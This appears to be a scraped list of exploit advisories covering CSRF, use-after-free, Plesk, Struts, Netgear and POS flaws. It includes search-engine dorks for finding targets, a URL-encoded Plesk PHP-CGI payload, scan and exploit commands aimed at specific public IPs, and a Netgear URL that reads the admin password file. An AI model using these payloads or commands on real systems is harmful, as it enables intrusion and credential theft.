This exploit allows an attacker to reset the admin password of AfterLogic WebMail Lite version <= 7.0.1 via Cross-Site Request Forgery (CSRF). The exploit can be found by searching for 'inurl:webmail/adminpanel/index.php?submit' using the DuckDuckGo search engine.
This exploit allows an attacker to reset the admin password of the php ticket system BETA 1 via Cross-Site Request Forgery (CSRF). The vulnerable URL is inurl:ticket/?p=process_change_password&id=1.
This module exploits a use-after-free vulnerability in Microsoft Internet Explorer where a DOM textNode pointer becomes corrupted after style computation. This pointer is then overwritten when the innerHTML property on the parent object is set.
Insufficient (or rather, a complete lack thereof) input sanitization leads to the injection of shell commands. It's possible to upload and execute a backdoor.
A security vulnerability was found in Xpient POS system running an instance of Iris 3.8 software; the POS cash drawer could be remotely triggered to open if a malicious agent has access to the POS network and is allowed to send a crafted message to the POS terminal hosting the cash drawer. No Authentication or encryption layer is required to exploit this vulnerability. As a result, the cash drawer opens and its content is physically accessible.
This Plesk configuration setting makes it possible: scriptAlias /phppath/ "/usr/bin/". Furthermore this is not cve-2012-1823 because the php interpreter is called directly (no php file is called). Parallels Plesk Remote Exploit -- PHP Code Execution and therefore Command Execution. Traces in /var/log/httpd/access_log: 192.168.74.142 - - [19/Mar/2013:18:59:41 +0100] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 200 203 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)". Shodanhq overview of Plesk on Linux: http://www.shodanhq.com/search?q=plesklin. perl plesk-simple.pl <ip address>. ./pnscan -w"GET /phppath/php HTTP/1.0rnrn" -r "500 Internal" 76.12.54.163/16 80. perl plesk-simple.pl 76.12.81.206.
This module exploits a remote command execution vulnerability in Apache Struts versions < 2.3.14.2. A specifically crafted request parameter can be used to inject arbitrary OGNL code into the stack bypassing Struts and OGNL library protections. When targeting an action which requires interaction through GET the payload should be split having into account the uri limits. In this case, if the rendered jsp has more than one point of injection, it could result in payload corruption. It should happen only when the payload is larger than the uri length.
Attackers can leverage this vulnerability to bypass existing authentication mechanisms and execute arbitrary commands on the affected devices, with root privileges. Briefly, the embedded web server skips authentication checks for some URLs containing the "currentsetting.htm" substring. As an example, the following URL can be accessed even by unauthenticated attackers: http://<target-ip-address>/setup.cgi?currentsetting.htm=1. Then, the "setup.cgi" page can be abused to execute arbitrary commands. As an example, to read the /www/.htpasswd local file (containing the clear-text password for the "admin" user), an attacker can access the following URL: http://<target-ip-address>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/¤tsetting.htm=1. Basically this URL leverages the "syscmd" function of the "setup.cgi" script to execute arbitrary commands. In the example above the command being executed is "cat /www/.htpasswd", and the output is displayed in the resulting web page. Slightly variations of this URL can be used to execute arbitrary commands.
SecureSphere Operations Manager is prone to a command-execution vulnerability. An attacker can exploit this issue to execute arbitrary commands in the context of the application.
DS3 Authentication Server (unknown version) is prone to a command execution vulnerability. Authentication server provides different admin tools to perform connectivity checks. TestTelnetConnection.jsp doesn't validate the user input, allowing an attacker to execute arbitrary commands in the server side with the privileges of asadmin user.
Services By CQR